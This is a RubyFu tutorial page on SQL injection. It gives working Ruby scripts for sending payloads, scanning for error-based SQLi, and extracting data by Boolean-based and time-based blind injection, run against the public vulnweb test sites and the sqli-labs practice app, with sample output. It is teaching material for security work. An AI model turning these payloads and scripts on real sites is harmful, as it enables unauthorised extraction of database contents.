<!DOCTYPE HTML>
<html lang="en" >
    
    <head>
        
        <meta charset="UTF-8">
        <meta http-equiv="X-UA-Compatible" content="IE=edge" />
        <title>SQL Injection Scanner | RubyFu</title>
        <meta content="text/html; charset=utf-8" http-equiv="Content-Type">
        <meta name="description" content="">
        <meta name="generator" content="GitBook 2.6.2">
        
        
        <meta name="HandheldFriendly" content="true"/>
        <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no">
        <meta name="apple-mobile-web-app-capable" content="yes">
        <meta name="apple-mobile-web-app-status-bar-style" content="black">
        <link rel="apple-touch-icon-precomposed" sizes="152x152" href="../gitbook/images/apple-touch-icon-precomposed-152.png">
        <link rel="shortcut icon" href="../gitbook/images/favicon.ico" type="image/x-icon">
        
    <link rel="stylesheet" href="../gitbook/style.css">
    
        
        <link rel="stylesheet" href="../gitbook/plugins/gitbook-plugin-anchors/plugin.css">
        
    
        
        <link rel="stylesheet" href="../gitbook/plugins/gitbook-plugin-splitter/splitter.css">
        
    
        
        <link rel="stylesheet" href="../gitbook/plugins/gitbook-plugin-expandable-chapters/expandable-chapters.css">
        
    
        
        <link rel="stylesheet" href="../gitbook/plugins/gitbook-plugin-highlight/website.css">
        
    
        
        <link rel="stylesheet" href="../gitbook/plugins/gitbook-plugin-search/search.css">
        
    
        
        <link rel="stylesheet" href="../gitbook/plugins/gitbook-plugin-fontsettings/website.css">
        
    
    
        <link rel="stylesheet" href="../styles/website.css">
    

        
    
    
    <link rel="next" href="../module_0x4__web_kung_fu/databases.html" />
    
    
    <link rel="prev" href="../module_0x4__web_kung_fu/index.html" />
    

        <script type="text/javascript" src="../styles/header.js"></script>
    </head>
    <body>
        
        
    <div class="book"
        data-level="4.1"
        data-chapter-title="SQL Injection Scanner"
        data-filepath="module_0x4__web_kung_fu/sql_injection_scanner.md"
        data-basepath=".."
        data-revision="Wed Jan 27 2016 09:00:51 GMT+0300 (AST)"
        data-innerlanguage="">
    

<div class="book-summary">
    <nav role="navigation">
        <ul class="summary">
            
            
            
            

            

            
    
    
        <li class="chapter " data-level="8" data-path="faqs/index.html">
            
                
                    <a href="../faqs/index.html">
                
                        <i class="fa fa-check"></i>
                        
                            <b>8.</b>
                        
                        FAQs
                    </a>
            
            
        </li>
    
        <li class="chapter " data-level="9" data-path="contributors/index.html">
            
                
                    <a href="../contributors/index.html">
                
                        <i class="fa fa-check"></i>
                        
                            <b>9.</b>
                        
                        Contributors
                    </a>
            
            
            <ul class="articles">
                
    
        <li class="chapter " data-level="9.1" data-path="contributors/todo.html">
            
                
                    <a href="../contributors/todo.html">
                
                        <i class="fa fa-check"></i>
                        
                            <b>9.1.</b>
                        
                        TODO
                    </a>
            
            
        </li>
    

            </ul>
            
        </li>
    


            
            <li class="divider"></li>
            <li>
                <a href="https://www.gitbook.com" target="blank" class="gitbook-link">
                    Published with GitBook
                </a>
            </li>
            
        </ul>
    </nav>
</div>

    <div class="book-body">
        <div class="body-inner">

            <div class="page-wrapper" tabindex="-1" role="main">
                <div class="page-inner">
                
                
                    <section class="normal" id="section-">
                    
                        <h1 id="sql-injection-scanner"><a name="sql-injection-scanner" class="plugin-anchor" href="#sql-injection-scanner"><span class="fa fa-link"></span></a>SQL Injection Scanner</h1>
<h2 id="basic-sqli-script-as-command-line-browser"><a name="basic-sqli-script-as-command-line-browser" class="plugin-anchor" href="#basic-sqli-script-as-command-line-browser"><span class="fa fa-link"></span></a>Basic SQLi script as command line browser</h2>
<p>This is a very basic script that takes your given payload, sends it in the vulnerable parameter, and returns the response back to you. I&apos;ll use (<a href="http://testphp.vulnweb.com/" target="_blank">http://testphp.vulnweb.com/</a>) as it&apos;s legal to test.</p>
<pre><code class="lang-ruby"><span class="hljs-comment">#!/usr/bin/env ruby</span>
<span class="hljs-comment"># KING SABRI | <span class="hljs-doctag">@KINGSABRI</span></span>
<span class="hljs-comment"># Send your payload from command line</span>
<span class="hljs-comment">#</span>
<span class="hljs-keyword">require</span> <span class="hljs-string">&quot;net/http&quot;</span>

# Usage check: two arguments are expected, the target host and the value to
# place in the artist parameter. With fewer, print the usage line and exit 0.
<span class="hljs-keyword">if</span> <span class="hljs-constant">ARGV</span>.size &lt; <span class="hljs-number">2</span>
  puts <span class="hljs-string">&quot;[+] ruby <span class="hljs-subst">#{__FILE_<span class="hljs-number">_</span>}</span> [IP ADDRESS] [PAYLOAD]&quot;</span>
  exit <span class="hljs-number">0</span>
<span class="hljs-keyword">else</span>
  host, payload = <span class="hljs-constant">ARGV</span>
<span class="hljs-keyword">end</span>

# Build http://HOST/artists.php?artist=VALUE. encode_www_form percent-encodes
# the value, so it reaches the server as one parameter value.
uri = <span class="hljs-constant">URI</span>.parse(<span class="hljs-string">&quot;http://<span class="hljs-subst">#{host}</span>/artists.php?&quot;</span>)
uri.query = <span class="hljs-constant">URI</span>.encode_www_form({<span class="hljs-string">&quot;artist&quot;</span> =&gt; <span class="hljs-string">&quot;<span class="hljs-subst">#{payload}</span>&quot;</span>})
http = <span class="hljs-constant">Net::HTTP</span>.new(uri.host, uri.port)
# The scheme is fixed to http in the URI above, so the branch below never
# enables TLS as the script stands.
http.use_ssl = <span class="hljs-keyword">true</span> <span class="hljs-keyword">if</span> uri.scheme == <span class="hljs-string">&apos;https&apos;</span>    <span class="hljs-comment"># Enable HTTPS support if it&apos;s HTTPS</span>
<span class="hljs-comment"># http.set_debug_output($stdout)</span>

# Send a single GET request and keep the whole response.
request = <span class="hljs-constant">Net::HTTP::Get</span>.new(uri.request_uri)
response = http.request(request)
<span class="hljs-comment"># puts &quot;[+] Status code: &quot;+ response.code + &quot;\n\n&quot;</span>
<span class="hljs-comment"># puts response.body.gsub(/&lt;.*?&gt;/, &apos;&apos;).strip</span>
# Print only the text of the h2 element whose id is pageName, with the tags
# stripped. The pattern is tied to this test site's page layout; on any other
# page it matches nothing and an empty line is printed.
puts response.body.scan(<span class="hljs-regexp">/&lt;h2 id=&apos;pageName&apos;&gt;.*&lt;\/h2&gt;/</span>).join.gsub(<span class="hljs-regexp">/&lt;.*?&gt;/</span>, <span class="hljs-string">&apos;&apos;</span>).strip

puts <span class="hljs-string">&quot;&quot;</span>
</code></pre>
<blockquote>
<p>I&apos;ve commented out the line <code>puts response.body.gsub(/&lt;.*?&gt;/, &apos;&apos;).strip</code> and added a custom regular expression that fits our target&apos;s output.</p>
</blockquote>
<p>Let&apos;s test it in action</p>
<pre><code>ruby sqli-basic.rb &quot;testphp.vulnweb.com&quot; &quot;-1 UNION ALL SELECT NULL,NULL,NULL,NULL#&quot; | grep -i -e warning -e error
# =&gt; Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /hj/var/www/artists.php on line 62

ruby sqli-basic.rb &quot;testphp.vulnweb.com&quot; &quot;-1 UNION ALL SELECT NULL,NULL,NULL#&quot; | grep -i -e warning -e error
# =&gt; 

ruby sqli-basic.rb &quot;testphp.vulnweb.com&quot; &quot;-1 UNION ALL SELECT NULL,@@VERSION,NULL#&quot;
# =&gt; artist: 5.1.73-0ubuntu0.10.04.1

ruby sqli-basic.rb &quot;testphp.vulnweb.com&quot; &quot;-1 UNION ALL SELECT NULL,GROUP_CONCAT(table_name),NULL FROM information_schema.tables#&quot; 
# =&gt; artist: CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,ENGINES,EVENTS,FILES,GLOBAL_STATUS,GLOBAL_VARIABLES,KEY_COLUMN_USAGE,PARTITIONS,PLUGINS,PROCESSLIST,PROFILING,REFERENTIAL_CONSTRAINTS,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,SESSION_STATUS,SESSION_VARIABLES,STATISTICS,TABLES,TABLE_CONSTRAINTS,TABLE_PRIVIL
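</code></pre><p>Here is a very basic and simple SQL-injection scanner; develop it as far as you can! It appends a probe string to the parameter and reports the URL when the response contains a known database error message.</p>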
<pre><code class="lang-ruby"><span class="hljs-comment">#!/usr/bin/env ruby</span>
<span class="hljs-comment"># KING SABRI | <span class="hljs-doctag">@KINGSABRI</span></span>
<span class="hljs-comment"># Very basic SQLi scanner!</span>
<span class="hljs-comment">#</span>
<span class="hljs-keyword">require</span> <span class="hljs-string">&apos;net/http&apos;</span>

<span class="hljs-comment"># Some SQLi payloads</span>
# Probe strings to append to the query; only payloads[0] is used below.
payloads =
    [
      <span class="hljs-string">&quot;&apos;&quot;</span>,
      <span class="hljs-string">&apos;&quot;&apos;</span>,
      <span class="hljs-string">&quot;&apos; or 1=2--+&quot;</span>
    ]

<span class="hljs-comment"># Some database error responses</span>
# Regexp fragments grouped by database engine; only errors[:mysql][0] is
# consulted below. NOTE(review): several entries (Warning, line.*[0-9]) are
# broad enough to match ordinary page text, so they would need tightening
# before being relied on.
errors =
    {
      <span class="hljs-symbol">:mysql</span> =&gt; [
                 <span class="hljs-string">&quot;SQL.*syntax&quot;</span>,
                 <span class="hljs-string">&quot;mysql.*(fetch).*array&quot;</span>,
                 <span class="hljs-string">&quot;Warning&quot;</span>
                ],
      <span class="hljs-symbol">:mssql</span> =&gt; [
                 <span class="hljs-string">&quot;line.*[0-9]&quot;</span>,
                 <span class="hljs-string">&quot;Microsoft SQL Native Client error.*&quot;</span>
                ],
      <span class="hljs-symbol">:oracle</span> =&gt; [
                  <span class="hljs-string">&quot;.*ORA-[0-9].*&quot;</span>,
                  <span class="hljs-string">&quot;Warning&quot;</span>
                 ]
      }

<span class="hljs-comment"># Try a known vulnerable site</span>
# The target is hard-coded here; the script never reads ARGV.
uri  = <span class="hljs-constant">URI</span>.parse <span class="hljs-string">&quot;http://testphp.vulnweb.com/artists.php?artist=1&quot;</span>

<span class="hljs-comment"># Update the query with a payload</span>
uri.query += payloads[<span class="hljs-number">0</span>]

<span class="hljs-comment"># Send get request</span>
# Net::HTTP.get returns the response body as a String.
response = <span class="hljs-constant">Net::HTTP</span>.get uri

<span class="hljs-comment"># Search if an error occurred = vulnerable</span>
# The check is error-string matching only: a page that hides database errors
# produces no match, and a match is a lead to verify rather than proof.
# NOTE(review): URL is not a constant defined by net/http or uri, so the
# interpolation below raises NameError at the moment a match is found; URI
# was presumably intended.
puts <span class="hljs-string">&quot;[+] The <span class="hljs-subst">#{<span class="hljs-constant">URL</span>.decode(uri.to_s)}</span> is vulnerable!&quot;</span> <span class="hljs-keyword">unless</span> response.match(<span class="hljs-regexp">/<span class="hljs-subst">#{errors[<span class="hljs-symbol">:mysql</span>][<span class="hljs-number">0</span>]}</span>/i</span>).<span class="hljs-keyword">nil</span>?
</code></pre>
<p>Try it on this URL (<a href="http://testasp.vulnweb.com/showforum.asp?id=0" target="_blank">http://testasp.vulnweb.com/showforum.asp?id=0</a>)</p>
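<p>Results (the listing above hard-codes its target and does not read the command-line argument, which is why the output names the testphp URL):</p>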
<pre><code>ruby sqli.rb http://testasp.vulnweb.com/showforum.asp?id=0
[+] The http://testphp.vulnweb.com/artists.php?artist=1&apos; is vulnerable!
</code></pre><h2 id="booleanbases-sqli-exploit-script"><a name="booleanbases-sqli-exploit-script" class="plugin-anchor" href="#booleanbases-sqli-exploit-script"><span class="fa fa-link"></span></a>Boolean-based SQLi Exploit Script</h2>
<p>Here is a Boolean-based SQLi exploit for the <a href="https://github.com/Audi-1/sqli-labs" target="_blank">sqli-labs</a> vulnerable application.</p>
<pre><code class="lang-ruby"><span class="hljs-comment">#!/usr/bin/env ruby</span>
<span class="hljs-comment"># Boolean-based SQLi exploit</span>
<span class="hljs-comment"># Sabri Saleh | <span class="hljs-doctag">@KINGSABRI</span></span>
<span class="hljs-comment">#</span>
<span class="hljs-keyword">require</span> <span class="hljs-string">&apos;open-uri&apos;</span>

# One argument is required: the host running the sqli-labs application.
# Without it, print the usage line and exit with status 0.
<span class="hljs-keyword">if</span> <span class="hljs-constant">ARGV</span>.size &lt; <span class="hljs-number">1</span>
  puts <span class="hljs-string">&quot;[+] ruby <span class="hljs-subst">#{__FILE_<span class="hljs-number">_</span>}</span> &lt;IP ADDRESS&gt;&quot;</span>
  exit <span class="hljs-number">0</span>
<span class="hljs-keyword">else</span>
  host = <span class="hljs-constant">ARGV</span>[<span class="hljs-number">0</span>]
<span class="hljs-keyword">end</span>

<span class="hljs-comment"># Just colorizing outputs</span>
# Reopens the core String class to add terminal colour helpers. red, green
# and bold each pass the string to colorize, which puts the given escape
# sequence in front of the text and the reset sequence \e[0m after it.
<span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">String</span></span>
  <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">red</span>;</span> colorize(<span class="hljs-keyword">self</span>, <span class="hljs-string">&quot;\e[1m\e[31m&quot;</span>); <span class="hljs-keyword">end</span>
  <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">green</span>;</span> colorize(<span class="hljs-keyword">self</span>, <span class="hljs-string">&quot;\e[1m\e[32m&quot;</span>); <span class="hljs-keyword">end</span>
  <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">bold</span>;</span> colorize(<span class="hljs-keyword">self</span>, <span class="hljs-string">&quot;\e[1m&quot;</span>); <span class="hljs-keyword">end</span>
  <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">colorize</span><span class="hljs-params">(text, color_code)</span>  &quot;<span class="hljs-comment">#{color_code}#{text}\e[0m&quot; end</span></span>
<span class="hljs-keyword">end</span>

<span class="hljs-comment"># SQL injection</span>
# Requests url followed by query and reports whether the page shows the
# application's success marker.
#
# url   - base URL ending in the injectable parameter (String)
# query - text appended to url before the request is made (String)
#
# Returns 1 when the body contains the marker text, nil otherwise.
# Any exception prints a message and ends the whole script with status 0.
#
# NOTE(review): URI.encode and Kernel#open on URLs are obsolete and were
# removed in Ruby 3.0, so this listing targets older Ruby versions.
<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">send_bbsqli</span><span class="hljs-params">(url, query)</span></span>
  <span class="hljs-keyword">begin</span>

    response = open(<span class="hljs-constant">URI</span>.parse( <span class="hljs-constant">URI</span>.encode(<span class="hljs-string">&quot;<span class="hljs-subst">#{url}</span><span class="hljs-subst">#{query}</span>&quot;</span>) ))

    # The marker string is what this lab page prints when the query condition
    # holds; its presence is the only signal read from the response.
    <span class="hljs-keyword">if</span> !response.read.scan(<span class="hljs-string">&quot;You are in...........&quot;</span>).empty?
      <span class="hljs-keyword">return</span> <span class="hljs-number">1</span> <span class="hljs-comment"># TRUE</span>
    <span class="hljs-keyword">end</span>

  # Rescuing Exception also traps Interrupt, so Ctrl-C during a request ends
  # up on this path and is reported as a failed request.
  <span class="hljs-keyword">rescue</span> <span class="hljs-constant">Exception</span> =&gt; e
    puts <span class="hljs-string">&quot;[!] Failed to SQL inject <span class="hljs-subst">#{e}</span>&quot;</span>.red 
    exit <span class="hljs-number">0</span>
  <span class="hljs-keyword">end</span>
<span class="hljs-keyword">end</span>

url = <span class="hljs-string">&quot;http://<span class="hljs-subst">#{host}</span>/sqli-labs/Less-8/index.php?id=&quot;</span>

puts <span class="hljs-string">&quot;[*] Start Sending Boolean-based SQLi&quot;</span>.bold

extracted = []
(<span class="hljs-number">1</span>..<span class="hljs-number">100</span>).map <span class="hljs-keyword">do</span> |position|
  (<span class="hljs-number">32</span>..<span class="hljs-number">126</span>).map <span class="hljs-keyword">do</span> |char|
     puts <span class="hljs-string">&quot;[*] Brute-forcing on Position: &quot;</span>.bold + <span class="hljs-string">&quot;<span class="hljs-subst">#{position}</span>&quot;</span>.green + <span class="hljs-string">&quot; | &quot;</span>.bold + <span class="hljs-string">&quot;Character: &quot;</span>.bold + <span class="hljs-string">&quot;<span class="hljs-subst">#{char}</span> = <span class="hljs-subst">#{char.chr}</span>&quot;</span>.green

     <span class="hljs-comment"># Put your query here </span>
<span class="hljs-comment">#      query = &quot;1&apos; AND (ASCII(SUBSTR((SELECT DATABASE()),#{position},1)))=#{char}--+&quot;</span>
     query = <span class="hljs-string">&quot;1&apos; AND (ASCII(SUBSTR((SELECT group_concat(table_name) FROM information_schema.tables WHERE table_schema=database() limit 0,1),<span class="hljs-subst">#{position}</span>,1)))=<span class="hljs-subst">#{char}</span>--+&quot;</span>
     result = send_bbsqli(url, query)
         <span class="hljs-keyword">if</span> result.eql? <span class="hljs-number">1</span>
           puts <span class="hljs-string">&quot;[+] Found character: &quot;</span>.bold + <span class="hljs-string">&quot;<span class="hljs-subst">#{char.to_s(<span class="hljs-number">16</span>)}</span> hex&quot;</span>.green

           extracted &lt;&lt;  char.chr
           puts <span class="hljs-string">&quot;[+] Extracted characters: &quot;</span>.bold + <span class="hljs-string">&quot;<span class="hljs-subst">#{extracted.join}</span>&quot;</span>.green
           <span class="hljs-keyword">break</span> 
         <span class="hljs-keyword">end</span>
   <span class="hljs-keyword">end</span>
<span class="hljs-keyword">end</span>

puts <span class="hljs-string">&quot;\n\n[+] Final found string: &quot;</span>.bold + <span class="hljs-string">&quot;<span class="hljs-subst">#{extracted.join}</span>&quot;</span>.green
</code></pre>
<h2 id="timebases-sqli-exploit-script"><a name="timebases-sqli-exploit-script" class="plugin-anchor" href="#timebases-sqli-exploit-script"><span class="fa fa-link"></span></a>Time-based SQLi Exploit Script</h2>
<p>A Time-based SQLi exploit for the <a href="https://github.com/Audi-1/sqli-labs" target="_blank">sqli-labs</a> vulnerable application.</p>
<pre><code class="lang-ruby"><span class="hljs-comment">#!/usr/bin/env ruby</span>
<span class="hljs-comment"># Time-based SQLi exploit</span>
<span class="hljs-comment"># Sabri Saleh | <span class="hljs-doctag">@KINGSABRI</span></span>
<span class="hljs-comment">#</span>
<span class="hljs-keyword">require</span> <span class="hljs-string">&apos;open-uri&apos;</span>

# One argument is required: the host running the sqli-labs application.
# Without it, print the usage line and exit with status 0.
<span class="hljs-keyword">if</span> <span class="hljs-constant">ARGV</span>.size &lt; <span class="hljs-number">1</span>
  puts <span class="hljs-string">&quot;[+] ruby <span class="hljs-subst">#{__FILE_<span class="hljs-number">_</span>}</span> &lt;IP ADDRESS&gt;&quot;</span>
  exit <span class="hljs-number">0</span>
<span class="hljs-keyword">else</span>
  host = <span class="hljs-constant">ARGV</span>[<span class="hljs-number">0</span>]
<span class="hljs-keyword">end</span>

<span class="hljs-comment"># Just colorizing outputs</span>
# Reopens the core String class to add terminal colour helpers. red, green
# and bold each pass the string to colorize, which puts the given escape
# sequence in front of the text and the reset sequence \e[0m after it.
<span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">String</span></span>
  <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">red</span>;</span> colorize(<span class="hljs-keyword">self</span>, <span class="hljs-string">&quot;\e[1m\e[31m&quot;</span>); <span class="hljs-keyword">end</span>
  <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">green</span>;</span> colorize(<span class="hljs-keyword">self</span>, <span class="hljs-string">&quot;\e[1m\e[32m&quot;</span>); <span class="hljs-keyword">end</span>
  <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">bold</span>;</span> colorize(<span class="hljs-keyword">self</span>, <span class="hljs-string">&quot;\e[1m&quot;</span>); <span class="hljs-keyword">end</span>
  <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">colorize</span><span class="hljs-params">(text, color_code)</span>  &quot;<span class="hljs-comment">#{color_code}#{text}\e[0m&quot; end</span></span>
<span class="hljs-keyword">end</span>

<span class="hljs-comment"># SQL injection</span>
# Times one request to url followed by query and reports whether it took at
# least time2wait seconds.
#
# url       - base URL ending in the injectable parameter (String)
# query     - text appended to url before the request is made (String)
# time2wait - threshold in seconds that counts as a positive answer
#
# Returns 1 when the elapsed time reaches time2wait, nil otherwise.
# Any exception prints a message and ends the whole script with status 0.
#
# The decision rests on elapsed wall-clock time alone, so a response delayed
# for any other reason (network latency, server load) is counted as a match.
# NOTE(review): URI.encode and Kernel#open on URLs are obsolete and were
# removed in Ruby 3.0, so this listing targets older Ruby versions.
<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">send_tbsqli</span><span class="hljs-params">(url, query, time2wait)</span></span>
  <span class="hljs-keyword">begin</span>
    start_time = <span class="hljs-constant">Time</span>.now
    # response is assigned but never read; only the duration is used.
    response = open(<span class="hljs-constant">URI</span>.parse( <span class="hljs-constant">URI</span>.encode(<span class="hljs-string">&quot;<span class="hljs-subst">#{url}</span><span class="hljs-subst">#{query}</span>&quot;</span>) ))
    end_time   = <span class="hljs-constant">Time</span>.now
    howlong    = end_time - start_time

    <span class="hljs-keyword">if</span> howlong &gt;= time2wait
      <span class="hljs-keyword">return</span> <span class="hljs-number">1</span> <span class="hljs-comment"># TRUE</span>
    <span class="hljs-keyword">end</span>

  # Rescuing Exception also traps Interrupt, so Ctrl-C during a request ends
  # up on this path and is reported as a failed request.
  <span class="hljs-keyword">rescue</span> <span class="hljs-constant">Exception</span> =&gt; e
    puts <span class="hljs-string">&quot;[!] Failed to SQL inject <span class="hljs-subst">#{e}</span>&quot;</span>.red 
    exit <span class="hljs-number">0</span>
  <span class="hljs-keyword">end</span>
<span class="hljs-keyword">end</span>

url = <span class="hljs-string">&quot;http://<span class="hljs-subst">#{host}</span>/sqli-labs/Less-10/index.php?id=&quot;</span>

puts <span class="hljs-string">&quot;[*] Start Sending Boolean-based SQLi&quot;</span>.bold
time2wait = <span class="hljs-number">5</span>
extracted = []
(<span class="hljs-number">1</span>..<span class="hljs-number">76</span>).map <span class="hljs-keyword">do</span> |position| 
  (<span class="hljs-number">32</span>..<span class="hljs-number">126</span>).map <span class="hljs-keyword">do</span> |char|
     puts <span class="hljs-string">&quot;[*] Brute-forcing on Position: &quot;</span>.bold + <span class="hljs-string">&quot;<span class="hljs-subst">#{position}</span>&quot;</span>.green + <span class="hljs-string">&quot; | &quot;</span>.bold + <span class="hljs-string">&quot;Character: &quot;</span>.bold + <span class="hljs-string">&quot;<span class="hljs-subst">#{char}</span> = <span class="hljs-subst">#{char.chr}</span>&quot;</span>.green

     <span class="hljs-comment"># Put your query here </span>
     query = <span class="hljs-string">&quot;1\&quot; AND IF((ASCII(SUBSTR((SELECT DATABASE()),<span class="hljs-subst">#{position}</span>,1)))=<span class="hljs-subst">#{char}</span>, SLEEP(<span class="hljs-subst">#{time2wait}</span>), NULL)--+&quot;</span>

     result = send_tbsqli(url, query, time2wait)
         <span class="hljs-keyword">if</span> result.eql? <span class="hljs-number">1</span>
           puts <span class="hljs-string">&quot;[+] Found character: &quot;</span>.bold + <span class="hljs-string">&quot;<span class="hljs-subst">#{char.to_s(<span class="hljs-number">16</span>)}</span> hex&quot;</span>.green

           extracted &lt;&lt;  char.chr
           puts <span class="hljs-string">&quot;[+] Extracted characters: &quot;</span>.bold + <span class="hljs-string">&quot;<span class="hljs-subst">#{extracted.join}</span>&quot;</span>.green
           <span class="hljs-keyword">break</span> 
         <span class="hljs-keyword">end</span>
   <span class="hljs-keyword">end</span>
<span class="hljs-keyword">end</span>

puts <span class="hljs-string">&quot;\n\n[+] Final found string: &quot;</span>.bold + <span class="hljs-string">&quot;<span class="hljs-subst">#{extracted.join}</span>&quot;</span>.green
</code></pre>

                    
                    </section>
                
                
                </div>
            </div>
        </div>

        
        
    </div>
</div>

        

        
    </body>
    
</html>
